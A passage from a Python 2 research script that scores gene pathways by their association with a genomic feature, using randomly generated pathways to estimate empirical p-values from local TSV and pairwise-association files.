return ( bName )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def readPathways ( pathwaysFilename ):
if ( debugFlag ):
print " in readPathways ... <%s> " % pathwaysFilename
fh = file ( pathwaysFilename, 'r' )
pwDict = {}
for aLine in fh:
aLine = aLine.strip()
aLine = aLine.upper()
tokenList = aLine.split('\t')
if ( len(tokenList) != 3 ): continue
if ( tokenList[0] == "pathway" ): continue
longPathwayName = tokenList[0]
shortPathwayName = tokenList[1]
geneTokens = tokenList[2].strip()
geneList = geneTokens.split(',')
geneList.sort()
if ( len(geneList) > 0 ):
while ( geneList[0] == '' ):
geneList = geneList[1:]
if ( len(geneList) == 0 ): continue
if ( len(geneList) == 0 ): continue
pathwayName = cleanUpName ( shortPathwayName )
pathwayName = pathwayName + "__" + "%d" % len(geneList)
if ( pathwayName not in pwDict.keys() ):
## print " adding pathway %s (%d) " % ( pathwayName, len(geneList) )
pwDict[pathwayName] = geneList
else:
if ( len(pwDict[pathwayName]) < len(geneList) ):
## print " substituting shorter list of genes for %s (%d) " % ( pathwayName, len(geneList) )
pwDict[pathwayName] = geneList
## else:
## print " NOT substituing list for %s " % pathwayName
fh.close()
print "## "
print "## have pathway dictionary with %d pathways " % len(pwDict)
## print " --> now looking for duplicate pathways ... "
pwList = pwDict.keys()
pwList.sort()
delList = []
pairDict = {}
for ii in range(len(pwList)-1):
iiName = pwList[ii]
iiLen = len(pwDict[iiName])
for jj in range(ii+1,len(pwList)):
jjName = pwList[jj]
jjLen = len(pwDict[jjName])
if ( jjLen != iiLen ): continue
if ( pwDict[iiName] == pwDict[jjName] ):
if ( debugFlag ):
print "\n\n SAME !!! "
print iiName, iiLen
print pwDict[iiName]
print jjName, jjLen
print pwDict[jjName]
iiSplit = iiName.split('__')
jjSplit = jjName.split('__')
if ( iiSplit[1] <= jjSplit[1] ):
pairNames = ( iiSplit[1], jjSplit[1] )
else:
pairNames = ( jjSplit[1], iiSplit[1] )
if ( pairNames in pairDict.keys() ):
pairDict[pairNames] += 1
else:
pairDict[pairNames] = 1
if ( iiSplit[1] == jjSplit[1] ):
if ( len(iiName) <= len(jjName) ):
delList += [ jjName ]
else:
delList += [ iiName ]
else:
if ( iiSplit[1] == "NCI-NATURE" ):
delList += [ jjName ]
elif ( jjSplit[1] == "NCI-NATURE" ):
delList += [ iiName ]
elif ( iiSplit[1] == "PID" ):
delList += [ jjName ]
elif ( jjSplit[1] == "PID" ):
delList += [ iiName ]
elif ( iiSplit[1] == "KEGG" ):
delList += [ jjName ]
elif ( jjSplit[1] == "KEGG" ):
delList += [ iiName ]
elif ( iiSplit[1] == "PWCOMMONS" ):
delList += [ jjName ]
elif ( jjSplit[1] == "PWCOMMONS" ):
delList += [ iiName ]
elif ( iiSplit[1] == "REACTOME" ):
delList += [ jjName ]
elif ( jjSplit[1] == "REACTOME" ):
delList += [ iiName ]
elif ( iiSplit[1] == "WIKIPATHWAYS" ):
delList += [ jjName ]
elif ( jjSplit[1] == "WIKIPATHWAYS" ):
delList += [ iiName ]
elif ( iiSplit[1] == "WIKIPW" ):
delList += [ jjName ]
elif ( jjSplit[1] == "WIKIPW" ):
delList += [ iiName ]
elif ( iiSplit[1] == "SMPDB" ):
delList += [ jjName ]
elif ( jjSplit[1] == "SMPDB" ):
delList += [ iiName ]
elif ( iiSplit[1] == "HUMANCYC" ):
delList += [ jjName ]
elif ( jjSplit[1] == "HUMANCYC" ):
delList += [ iiName ]
else:
sys.exit(-1)
for aName in delList:
try:
del pwDict[aName]
except:
doNothing = 1
print "## "
print "## returning pathway dictionary with %d pathways " % len(pwDict)
print "## "
if ( debugFlag ):
for aKey in pairDict.keys():
print aKey, pairDict[aKey]
print " "
print " "
return ( pwDict )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def addRandomPathways ( pwDict, numRandFactor ):
numRand = numRandFactor * len(pwDict)
( randDict, minLen, maxLen ) = makeRandomPathways ( pwDict, numRand )
print "## --> adding %d random pathways to original set of %d pathways " % ( len(randDict), len(pwDict ) )
if ( 1 ):
print "## using current system time to set seed "
random.seed()
for aKey in randDict.keys():
pwDict[aKey] = randDict[aKey]
print "## --> returning pathway dictionary with %d pathways " % len(pwDict)
return ( pwDict, minLen, maxLen )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def pickRandom ( aList ):
ii = random.randint ( 0, len(aList)-1 )
return ( aList[ii] )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def makeRandomPathways ( pwDict, numRand ):
pwLenList = []
pwGeneList = []
randDict = {}
## create a non-unique gene list ... meaning that if a gene appears many
## times in different pathways, then it will appear many times in this
## list and will get selected many times to create random pathways
## geneListFlag = 'unique'
geneListFlag = 'NOT-unique'
print "## in makeRandomPathways ... ", len(pwDict), numRand, geneListFlag
for aPw in pwDict.keys():
for aGene in pwDict[aPw]:
if ( geneListFlag == 'unique' ):
if ( aGene not in pwGeneList ):
pwGeneList += [ aGene ]
elif ( geneListFlag == 'NOT-unique' ):
pwGeneList += [ aGene ]
else:
print "## ERROR ??? invalid geneListFlag ", geneListFlag
sys.exit(-1)
curLen = len(pwDict[aPw])
if ( 0 ):
pwLenList += [ curLen ]
else:
## or maybe we should only do unique pathway sizes so that we get
## a better distribution for both common and uncommon pathway sizes?
if ( curLen not in pwLenList ):
pwLenList += [ curLen ]
pwLenList.sort()
print "## len(pwGeneList) = %d " % len(pwGeneList)
print "## len(pwLenList) = %d " % len(pwLenList), min(pwLenList), max(pwLenList)
print "## ", pwLenList
jRand = 0
for iRand in range(numRand):
## work through the length options methodically ...
curLen = pwLenList[jRand]
jRand += 1
if ( jRand == len(pwLenList) ): jRand = 0
curList = []
while ( len(curList) < curLen ):
aGene = pickRandom ( pwGeneList )
if ( aGene not in curList ):
curList += [ aGene ]
curName = "RANDOM_PATHWAY_%d__%d" % ( (iRand+1), curLen )
randDict[curName] = curList
## print curName, curList
minLen = min(pwLenList)
maxLen = max(pwLenList)
return ( randDict, minLen, maxLen )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getPairwisePvalues ( pwpvFilename, pwGeneList, featureName, geneDataType,
maxDist, corrSign, minLogP ):
pwpvData = {}
fh = file ( pwpvFilename )
firstCheck = 1
if ( debugFlag ): print " ... working our way through <%s> ... " % pwpvFilename
numLines = 0
for aLine in fh:
numLines += 1
if ( numLines%10000000 == 0 ):
print "## ", numLines, len(pwpvData)
if ( aLine.find(geneDataType) < 0 ): continue
tokenList = aLine.split('\t')
## print tokenList
if ( len(tokenList) < 12 ): continue
## if a minimum distance has been set, then check that ...
abDist = -1
if ( maxDist >= 0 ):
try:
abDist = int ( tokenList[11] )
if ( abDist > maxDist ): continue
except:
print "## HUH ??? failed to get distance ??? "
print "## ", tokenList
sys.exit(-1)
## grab the two feature names
try:
aLabel = tokenList[0]
bLabel = tokenList[1]
except:
print "## HUH ??? failed to get two feature names ??? "
print "## ", tokenList
sys.exit(-1)
skipFlag = 1
aMatch = ( aLabel == featureName )
bMatch = ( bLabel == featureName )
if ( aMatch ):
if ( bLabel.startswith(geneDataType) ):
bTokens = bLabel.split(':')
bGene = bTokens[2]
if ( bGene in pwGeneList ):
skipFlag = 0
aKey = bGene
elif ( bMatch ):
if ( aLabel.startswith(geneDataType) ):
aTokens = aLabel.split(':')
aGene = aTokens[2]
if ( aGene in pwGeneList ):
skipFlag = 0
aKey = aGene
if ( skipFlag ): continue
pValue = float ( tokenList[4] )
if ( abDist < 0 ): abDist = int ( tokenList[11] )
## moved this again ... 13dec13
## if the correlation sign does not match the ones we have been
## told to look for, then the pValue gets forced to ZERO
## (ie completely insignificant)
try:
corrVal = float ( tokenList[2] )
except:
corrVal = "NA"
if ( corrSign != "" ):
if ( tokenList[2] != "NA" ):
if ( corrSign == '+' ):
if ( corrVal < 0. ):
pValue = 0.
corrVal = 0.
elif ( corrSign == '-' ):
if ( corrVal > 0. ):
pValue = 0.
corrVal = 0.
else:
if ( firstCheck ):
print " WARNING !!! correlation sign not known ... careful interpreting results ", tokenList
firstCheck = 0
try:
            ( oldP, oldCorr, oldDist ) = pwpvData[aKey]
if ( oldP < pValue ):
pwpvData[aKey] = ( pValue, corrVal, abDist )
except:
pwpvData[aKey] = ( pValue, corrVal, abDist )
fh.close()
## filter out the lower p-values (optional)
if ( minLogP > 0 ):
pwpvData = filterLowP ( pwpvData, minLogP )
print "## returning from getPairwisePvalues ... ", numLines, len(pwpvData)
if ( debugFlag ): print " --> DONE ... have p-values for %d pairs " % len(pwpvData)
return ( pwpvData )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def findTopGenes ( pwpvData, nTop ):
print "## "
print "## "
allKeys = pwpvData.keys()
numKeys = len(allKeys)
if ( numKeys < nTop ):
nTop2 = numKeys
else:
nTop2 = nTop
pList = []
for aKey in allKeys:
pList += [ pwpvData[aKey][0] ]
pList.sort(reverse=True)
pThresh = pList[nTop2-1]
print "## range of p-values: %.1f to %.1f " % ( pList[-1], pList[0] )
if ( 0 ):
for ii in range(len(pList)):
print "## pList.sort \t %4d \t %5.1f " % ( ii, pList[ii] )
print "## p-value threshold for top %d genes is %.1f " % ( nTop2, pThresh )
topGenes = []
topPs = []
for aKey in allKeys:
if ( pwpvData[aKey][0] >= pThresh ):
topGenes += [ aKey ]
curP = pwpvData[aKey][0]
topPs += [ curP ]
print "## top-scoring genes (not sorted) : "
for ii in range(nTop2):
try:
print "## %16s %6.1f " % ( topGenes[ii], topPs[ii] )
except:
doNothing = 1
print "## "
print "## "
return ( topGenes )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def pwMembership ( pwDict, topGenes ):
print "## "
print "## in pwMembership ... "
print "## topGenes list : ", topGenes
print "## "
oLapDict = {}
maxO = 0
for aPW in pwDict.keys():
if ( aPW.startswith("RANDOM_PATHWAY") ): continue
numO = 0
for aGene in topGenes:
if ( aGene in pwDict[aPW] ):
numO += 1
if ( numO > 1 ):
if ( numO in oLapDict.keys() ):
oLapDict[numO] += [ aPW ]
else:
oLapDict[numO] = [ aPW ]
if ( maxO < numO ):
maxO = numO
print "## "
print "## pathway membership of the top-scoring genes : "
for ii in range(maxO,0,-1):
if ( ii in oLapDict.keys() ):
if ( len(oLapDict[ii]) > 0 ):
print "## %3d " % ii, oLapDict[ii]
print "## "
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def pwMembership2 ( pwDict, pwpvData ):
allKeys = pwpvData.keys()
numKeys = len(allKeys)
for aPW in pwDict.keys():
if ( aPW.startswith("RANDOM_PATHWAY") ): continue
numO = 0
oLapDict = {}
for aGene in allKeys:
## print aGene, pwpvData[aGene]
if ( aGene in pwDict[aPW] ):
numO += 1
pVal = pwpvData[aGene][0]
rhoV = pwpvData[aGene][1]
if ( pVal in oLapDict.keys() ):
oLapDict[pVal] += [ ( aGene, rhoV ) ]
else:
oLapDict[pVal] = [ ( aGene, rhoV ) ]
if ( len(oLapDict) > 0 ):
oLapKeys = oLapDict.keys()
oLapKeys.sort(reverse=True)
outLine = "## pwMembership2: %3d %s (%d) " % ( numO, aPW, len(oLapKeys) )
## print len(oLapKeys), oLapKeys[0], oLapDict[oLapKeys[0]]
for aKey in oLapKeys:
for aTuple in oLapDict[aKey]:
aGene = aTuple[0]
rhoV = aTuple[1]
try:
outLine += " (%s, %.1f, %.1f) " % ( aGene, rhoV, aKey )
except:
if ( rhoV == "NA" ):
outLine += " (%s, NA, %.1f) " % ( aGene, aKey )
else:
print " ERROR adding to outLine ??? ", aGene, rhoV, aKey
print outLine
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
## pwpvData has keys that are gene symbols, eg 'TP53BP1'
## and values that are tuples like ( -log(p), rho, dist )
## where the first value is the -log10(p), the second is the correlation, and the third the genomic distance
def filterLowP ( pwpvData, minLogP ):
print "## in filterLowP : ", len(pwpvData), minLogP
newD = {}
for aKey in pwpvData.keys():
if ( pwpvData[aKey][0] >= minLogP ):
newD[aKey] = pwpvData[aKey]
print "## after filtering : ", len(newD)
return ( newD )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getInfoFromTSV ( tsvFilename, featureName ):
## we start by opening and reading the entire input feature matrix
print "## "
print "## opening input TSV file <%s> " % tsvFilename
print "## "
fh = file ( tsvFilename )
wholeFile = fh.read()
fh.close()
print "## --> data file size : %d " % len(wholeFile)
print "## (b) TIME ", time.asctime(time.localtime(time.time()))
## then we split the file into lines
allLines = wholeFile.split("\n")
numLines = len(allLines)
## extract the row labels from lines 2 thru end ...
## a) build geneList
## b) make sure that the specified featureName(s) exists
tsvGeneList = []
featureIndex = -1
nFound = 0
## keep track of the first few names that match ...
maxNames = 20
namesFound = [0] * maxNames
for ii in range(1,len(allLines)):
aLine = allLines[ii].strip()
lineTokens = aLine.split("\t")
labelTokens = lineTokens[0].split(":")
if ( aLine.startswith(geneDataType) ):
geneSymbol = labelTokens[2]
if ( geneSymbol != '' ):
tsvGeneList += [ geneSymbol ]
if ( 1 ):
curName = featureName
if ( lineTokens[0] == curName ):
if ( featureIndex < 0 ):
featureIndex = ii - 1
nFound += 1
if ( nFound <= maxNames ):
namesFound[nFound-1] = lineTokens[0]
print "## --> length of gene list : %d " % len(tsvGeneList)
print "##"
## if we only found one feature that matched the prefix specified in
## the feature name list, then replace it with the complete feature name
if ( 1 ):
if ( nFound == 1 ):
aLine = allLines[featureIndex+1].strip()
lineTokens = aLine.split("\t")
print "## --> unique feature <%s> found at index %d : %s " % \
( featureName, featureIndex, lineTokens[0] )
featureName = lineTokens[0]
elif ( nFound > 1 ):
print " FATAL ERROR ... NOT ALLOWED ... "
sys.exit(-1)
print "## --> found %d features with <%s> " % ( nFound, featureName )
if ( nFound < maxNames ):
print "## ", namesFound[:nFound]
else:
print "## --> insufficient number of features found ... "
print "## ", nFound, featureName
sys.exit(-1)
    elif ( nFound > 0 ):
print " FATAL ERROR ... NOT ALLOWED ... "
print "## --> found %d features with <%s> " % ( nFound, featureName )
if ( nFound < maxNames ):
print "## ", namesFound[:nFound]
else:
print "## --> insufficient number of features found ... "
print "## ", nFound, featureName
sys.exit(-1)
return ( tsvGeneList )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getPathwayInfo ( pathwaysFile ):
## next we need to read the pathway definitions ...
pwDict = readPathways ( pathwaysFile )
pwList = pwDict.keys()
pwList.sort()
print "## --> number of pathways : %d " % len(pwList)
## and form a gene list based on the pathways ...
pwGeneList = []
pwSum1 = 0
pwSum2 = 0
numDup = 0
for aPW in pwList:
## print pwDict[aPW]
pwLen = len(pwDict[aPW])
pwSum1 += pwLen
pwSum2 += ( pwLen * pwLen )
for aGene in pwDict[aPW]:
if ( aGene not in pwGeneList ):
pwGeneList += [ aGene ]
else:
numDup += 1
pwAvg1 = float(pwSum1)/float(len(pwList))
pwAvg2 = float(pwSum2)/float(len(pwList))
pwSigma = math.sqrt ( pwAvg2 - pwAvg1 * pwAvg1 )
print "## --> average # of genes in each pathway : %.1f (%.1f) " % ( pwAvg1, pwSigma )
print "## --> length of pathway gene list : %d (%d) " % ( len(pwGeneList), numDup )
if ( debugFlag ): print pwGeneList
print "## "
print "## (c) TIME ", time.asctime(time.localtime(time.time()))
print "## "
return ( pwDict, pwGeneList )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def compareGeneLists ( tsvGeneList, pwGeneList, pwDict ):
pwList = pwDict.keys()
pwList.sort()
## NEW: now checking if any of the pathway genes are NOT in the tsvGeneList ???
numNotFound = 0
for aGene in pwGeneList:
if ( aGene not in tsvGeneList ):
print "## gene <%s> in one or more pathways but not in feature matrix " % aGene
numNotFound += 1
if ( numNotFound > 0 ):
print "## --> %d genes found in one or more pathways but not in feature matrix " % numNotFound
pwGeneList = []
for aPW in pwList:
newList = []
for aGene in pwDict[aPW]:
if ( aGene in tsvGeneList ):
newList += [ aGene ]
if ( aGene not in pwGeneList ):
pwGeneList += [ aGene ]
if ( newList != pwDict[aPW] ):
oldLen = len(pwDict[aPW])
del ( pwDict[aPW] )
if ( len(newList) == 0 ):
print "## eliminating pathway <%s> " % ( aPW )
else:
print "## replacing gene list for pathway <%s> (%d -> %d) " % ( aPW, oldLen, len(newList) )
kk = aPW.find("__")
newName = aPW[:kk] + "__" + "%d" % len(newList)
pwDict[newName] = newList
print "## --> new pathway label: <%s> " % newName
print "## --> NEW length of pathway gene list : %d " % ( len(pwGeneList) )
return ( pwGeneList )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
## outLines is a list, and one entry looks like this:
## [493.7, [' 493.7', 'RANDOM_PATHWAY_33329__72', '\n']]
def parseOutput ( pwScores, pwDict ):
pwKeys = pwDict.keys()
pwKeys.sort()
maxScore = -999999
minScore = 999999
outLines = []
for ii in range(len(pwScores)):
curScore = pwScores[ii]
if ( curScore > maxScore ): maxScore = curScore
if ( curScore < minScore ): minScore = curScore
curPW = pwKeys[ii]
aLine = [ curScore, [ str(curScore), curPW ] ]
outLines += [ aLine ]
return ( outLines, maxScore, minScore )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def scoreOutput ( outLines, iMaxScore, iMinScore, pwDict ):
iMaxScore = int ( iMaxScore + 0.5 )
iMinScore = int ( iMinScore )
## no need to have too many discrete values ... just makes the counts matrix
## too big and slows everything down ...
min_sFactor = 10.
## min_sFactor = 2.
sFactor = max ( float(iMaxScore/2001.), min_sFactor )
iMaxScore = int ( float(iMaxScore/sFactor) + 0.5 )
## forcing iMinScore to zero ... after this it will not really be used ...
iMinScore = 0
print "## range of integer scores we will use : ", iMinScore, iMaxScore
print "## using score scale factor : ", sFactor
numOut = len(outLines)
print "## numOut = ", numOut
numReal = float(numOut)/float(numRandFactor+1)
numRand = numOut - numReal
print "## numReal = ", numReal
print "## numRand = ", numRand
print "## (i) TIME ", time.asctime(time.localtime(time.time()))
## NEW:
## we will build up a matrix of numHi/numLo counts as a function of
## pathway size (n), and pathway score (s)
## also at this point forcing minLen to 0 ... will not really be used after this
minLen = 0
numN = int ( maxLen ) + 1
numS = int ( iMaxScore + 1 ) + 1
print "## size of countsHiLo matrix: %d x %d ... [%d,%d] and [%d,%d]" % \
( numN, numS, minLen, maxLen, iMinScore, iMaxScore )
countsHiLo = [0] * numN
for iN in range(numN):
countsHiLo[iN] = [0] * numS
for iS in range(numS):
countsHiLo[iN][iS] = [0,0]
print "## (j) TIME ", time.asctime(time.localtime(time.time()))
print "## now setting up countsHiLo matrix ... "
## set up a dictionary that maps from pathway name to pathway length so we
## don't have to figure that out repeatedly ...
pwLenDict = {}
for aPW in pwDict.keys():
curPW = aPW
kk = curPW.find("__")
curLen = int ( curPW[kk+2:] )
pwLenDict[curPW] = curLen
## we only need to loop once over all of the pathways that have been scored
## and then increment the appropriate counts
for iTuple in range(len(outLines)):
keyVal = outLines[iTuple][0]
tokenList = outLines[iTuple][1]
curPW = tokenList[1]
## if ( iTuple%1000 == 0 ): print iTuple, keyVal, tokenList, curPW
if ( 1 ):
## we will only consider random pathways
if ( curPW.find("RANDOM") >= 0 ):
if ( 0 ):
kk = curPW.find("__")
rndLen = int ( curPW[kk+2:] )
else:
rndLen = pwLenDict[curPW]
rndScore = float ( keyVal )
rndScore = int ( (rndScore/sFactor) + 0.5 )
if ( 0 ):
print "## random pathway ... %d %d %s " % ( rndLen, rndScore, curPW )
print "## increment HI counts from (%d,0) to (%d,%d) " % ( rndLen, numN-1, rndScore )
print "## and LO counts from (0,%d) to (%d,%d) " % ( rndScore+1, rndLen-1, numS-1 )
## ----------------------------------------- ##
## THIS IS THE CODE CURRENTLY BEING USED !!! ##
## ----------------------------------------- ##
## current score is (n,s) ranges are: 0 thru N-1 and 0 thru S-1
## THIS random pathway will be considered 'better' (HI) than ~real~ pathways
## that are longer and score worse ... and will be considered 'worse' (LO)
## than ~real~ pathways that are shorter and score better
if ( 1 ):
## first increment the HI counts ...
## for pathway lengths greater than or equal to (n, n+1, n+2, ... N-1)
## and scores less than or equal to (0, 1, 2, ... s-1)
for iN in range(rndLen, numN):
for iS in range(0, rndScore+1):
countsHiLo[iN][iS][0] += 1
## and then the LO counts ...
## for pathway lengths less than or equal to (0, 1, 2, ... n)
## and scores greater than (s+1, s+2, s+3, ... S-1)
for iN in range(0, rndLen):
for iS in range(rndScore+1,numS):
countsHiLo[iN][iS][1] += 1
print "## (k) TIME ", time.asctime(time.localtime(time.time()))
print "## now computing estimated p values ... "
## and once we have the countsHiLo matrix we do one more pass to estimate the p-values
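    ## for a scored pathway of length n and (scaled) score s, the estimated p-value
    ## is the fraction of comparable random pathways that did at least as well:
    ##     p ~ (numHi+1) / (numHi+numLo+1)
    ## reported below as -log10(p)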
estLogP = [0] * len(outLines)
for iTuple in range(len(outLines)):
keyVal = outLines[iTuple][0]
tokenList = outLines[iTuple][1]
curPW = tokenList[1]
## if ( iTuple%1000 == 0 ): print iTuple, keyVal, tokenList, curPW
if ( 1 ):
kk = curPW.find("__")
curLen = int ( curPW[kk+2:] )
curScore = float ( keyVal )
curScore = int ( (curScore/sFactor) + 0.5 )
numHi = countsHiLo[curLen][curScore][0]
numLo = countsHiLo[curLen][curScore][1]
## print "## --> curLen=%d curScore=%d numHi=%d numLo=%d " % ( curLen, curScore, numHi, numLo )
try:
try:
tmpLogP = -1. * math.log10 ( float(numHi+1)/float(numHi+numLo+1) )
except:
print " ERROR computing tmpLogP ??? ", numHi, numLo
sys.exit(-1)
try:
estLogP[iTuple] = ( tmpLogP, numHi, numLo )
except:
print " ERROR storing tuple ??? ", tmpLogP, numHi, numLo
print iTuple, len(estLogP)
print estLogP
sys.exit(-1)
try:
## print " ", iTuple, curLen, curScore, tmpLogP
if ( 1 ):
if ( tmpLogP >= 1. ):
if ( (numHi+numLo) < numRandFactor ):
print "## maybe too few counts for p-value estimate ??? ", (numHi+numLo), numHi, numLo
except:
print " stupid stupid stupid error "
sys.exit(-1)
except:
print "## failed in attempt to estimate p value ??? ", numHi, numLo
sys.exit(-1)
return ( countsHiLo, estLogP )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def prettyPrintScores ( outLines, estLogP ):
print "## "
print "## (l) TIME ", time.asctime(time.localtime(time.time()))
print "## "
print "## RANKED and SCORED Pathways : "
print "## "
for iTuple in range(len(outLines)):
keyVal = outLines[iTuple][0]
tokenList = outLines[iTuple][1]
curPW = tokenList[1]
if ( 1 ):
try:
outLine = "%.2f\t%d\t%d\t" % ( estLogP[iTuple][0], estLogP[iTuple][1], estLogP[iTuple][2] )
except:
outLine = "-99\t-99\t-99\t"
for aToken in tokenList:
if ( aToken == '\n' ):
doNothing = 1
elif ( aToken.endswith('\n') ):
outLine += "%s\t" % aToken[:-1]
else:
outLine += "%s\t" % aToken
print outLine
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# ok ... cleaning this function up entirely ...
# pwDict is the pathway dictionary, including random pathways -- keys are
# pathway names, and associated with each key is a list of gene symbols
# pwpvData is the pairwise data dict, where the keys are gene symbols and
# associated to each key is a tuple ( -log(p), rho, dist )
def goScorePathways ( pwDict, pwpvData ):
pwKeys = pwDict.keys()
pwKeys.sort()
pwpvKeys = pwpvData.keys()
## print " pwDict ", len(pwDict), pwKeys[0], pwDict[pwKeys[0]]
## print " pwpvData ", len(pwpvData), pwpvKeys[0], pwpvData[pwpvKeys[0]]
# we really just want a dictionary with the p-values and not those data triples ...
pDict = {}
for aKey in pwpvKeys:
pVal = pwpvData[aKey][0]
if ( pVal > 0. ):
pDict[aKey] = pVal
# and now we can score each pathway ...
pwScores = [0] * len(pwKeys)
for ii in range(len(pwKeys)):
if ( 0 ):
if ( ii%50000 == 0 ):
print "## (z) TIME ", ii, time.asctime(time.localtime(time.time()))
curPW = pwKeys[ii]
for aGene in pwDict[curPW]:
try:
pwScores[ii] += pDict[aGene]
except:
doNothing=1
print "## range of pathway scores : ", min(pwScores), max(pwScores)
return ( pwScores )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
## this function seeks to score/rank pathways (which can also be just arbitrary
## lists of genes) based on associations to a particular feature (or set of
## features)
##
## inputs required:
## a TSV feature matrix
## a corresponding pairwise output file
## a pathways-definition file
## a feature name of interest, eg C:SAMP:PAM50_call or B:GNAB:driverMut:
## the gene-based data type (typically N:GEXP: but can be N:METH:)
## the maximum genomic distance allowed betwen the two features in any
## significant association -- this is typically used to require
## that the two features be close together ... if they can be
## any distance apart, then use -1 (NOTE that there is no way to
## force them to be at least X distance apart)
## an optional threshold on the p-values (-log(p)) >= 0
## an optional correlation sign ('+' or '-')
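##
## a hypothetical example invocation (the script name and file names are placeholders;
## the flags correspond to the argparse options defined below):
##
##   python2 scorePathways.py \
##       --tsvFile featureMatrix.tsv \
##       --pwpvFile pairwise.pwpv \
##       --pathways pathways.tsv \
##       --featName C:SAMP:PAM50_call \
##       --dataType N:GEXP: \
##       --maxDist -1 --pThresh 2.0 --sign + --nRand 1000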
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='pathway-scoring')
parser.add_argument('--tsvFile', '-tsv', action='store', required=True)
parser.add_argument('--pwpvFile', '-pw', action='store', required=True)
parser.add_argument('--pathways', '-P', action='store', required=True)
parser.add_argument('--featName', '-f', action='store', required=True)
parser.add_argument('--dataType', '-d', action='store', default="N:GEXP:")
parser.add_argument('--maxDist', '-D', action='store', default=-1, type=int)
parser.add_argument('--pThresh', '-T', action='store', default= 0, type=float)
parser.add_argument('--sign', '-s', action='store', default='x')
parser.add_argument('--nRand', '-N', action='store', default=1000, type=int)
args = parser.parse_args()
tsvFilename = args.tsvFile
pwpvFilename = args.pwpvFile
pathwaysFile = args.pathways
featureNameString = args.featName
geneDataType = args.dataType
maxDist = args.maxDist
minLogP = args.pThresh
corrSign = args.sign
numRandFactor = args.nRand
if ( corrSign != '+' ):
if ( corrSign != '-' ):
corrSign = ''
print "## RUNNING %s with : " % sys.argv[0]
print "## %s " % tsvFilename
print "## %s " % pwpvFilename
print "## %s " % pathwaysFile
print "## %s = geneDataType " % geneDataType
print "## %d = maxDist " % maxDist
print "## %s = corrSign " % corrSign
print "## %d = numRandFactor " % numRandFactor
## the 'featureNameString' might be a semi-colon separated list ...
if ( featureNameString.find(";") > 0 ):
print " FATAL ERROR ... THIS IS NOT ALLOWED ... "
print " <%s> " % featureNameString
sys.exit(-1)
else:
featureName = featureNameString
print "## %s " % featureName
print "## (a) TIME ", time.asctime(time.localtime(time.time()))
## ------------------------------------------------------------------------
## first we need some information from the feature matrix (TSV) ...
tsvGeneList = getInfoFromTSV ( tsvFilename, featureName )
## print tsvGeneList[:5]
## print tsvGeneList[-5:]
## ------------------------------------------------------------------------
## next we need to read the pathway definitions and form a gene list ...
( pwDict, pwGeneList ) = getPathwayInfo ( pathwaysFile )
## --> pwDict is a dictionary with 224 pathways, with names, like "PS1PATHWAY__46"
## and each pathway is a list of gene symbols
## --> pwGeneList is a list of ~2600 genes
if ( 0 ):
print len(pwDict)
aKey = pwDict.keys()[0]
print aKey
print pwDict[aKey]
print len(pwGeneList)
print pwGeneList[:5]
## ------------------------------------------------------------------------
## check pwGeneList against tsvGeneList ... and remove gene symbols that
## are in the pwGeneList that we don't know anything about (ie are not in
## the tsvGeneList)
pwGeneList = compareGeneLists ( tsvGeneList, pwGeneList, pwDict )
print "## (d) TIME ", time.asctime(time.localtime(time.time()))
## ------------------------------------------------------------------------
## now we can read in all pairwise information that we have for these
## genes ...
print "## --> reading in pairwise (PWPV) data ... "
pwpvData = getPairwisePvalues ( pwpvFilename, pwGeneList, featureName, \
geneDataType, maxDist, corrSign, minLogP )
if ( len(pwpvData) == 0 ):
print "## ERROR ??? how do we not have any information here ??? "
sys.exit(-1)
print "## --> got %d values ... " % len(pwpvData)
print "## (f) TIME ", time.asctime(time.localtime(time.time()))
## when we get here, the keys in pwpvData are just the gene symbols
    ## and the data associated with a key is a tuple: ( -log(p), rho, dist )
keyList = pwpvData.keys()
if ( debugFlag ):
print keyList[:5]
